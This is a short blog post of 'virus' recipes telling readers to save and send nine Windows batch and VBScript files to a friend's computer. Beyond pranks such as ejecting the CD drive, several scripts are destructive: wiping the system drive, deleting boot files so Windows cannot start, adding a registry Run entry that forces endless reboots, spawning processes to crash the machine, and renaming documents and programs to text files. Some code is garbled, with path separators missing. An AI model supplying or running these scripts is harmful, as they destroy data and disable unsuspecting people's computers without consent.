CREATE A VIRUS CODE AND CRASH YOUR FRIEND'S COMPUTER

CREATE YOUR OWN VIRUS 




HOW TO CREATE A VIRUS OWN?

Type the following virus code in to the notepad and save it as following commands given below.


virus 1:  This code is used to make continually pop out CD drive


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
leep 5000
loop

save it as "example.VBS" and message to your friend's computer


virus 2 :   This code is used to convey a little message and shut down his/her computer


@echo off
msg *(write a message) 
shutdown -c "Error! You are too stupid!" -s

save it as "example.BAT" in all files and send to his/her computer.



virus 3 :   This code is used to toggle the caps lock simultaneously.



Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

save it as "example.VBS" and send to his/her computer.



virus 4:  This virus is used to deletes all content of a drive.



@echo off 

del %systemdrive%*.* /f /s /q 
shutdown -r -f -t 00 

Save The Above Code As "example.bat"      



virus 5 : this virus is used to crash your computer fully,be care full.


Option Explicit

Dim WSHShell 
Set WSHShell=Wscript.CreateObject("Wscript.Shell") 

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As "example.vbs"
It Only Works With Windows XP

virus 6: this virus is used to crash the window  


@Echo off 
Del C: *.* |y

Save It As "example.bat"


virus 7:  This virus is used to pop up a message as OWNED and it will shut down computer never reboot again

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

Save As "example.bat" 

virus 8:  This is used to shut down every time when it is turn on.

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d
c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d
c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

Save As "example.bat" 

virus 9: This is used to change the file format as non working text file.

REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

Save As "example.bat" 






0 comments:

SHARETHIS

Copyright © 2013 TechnewDhans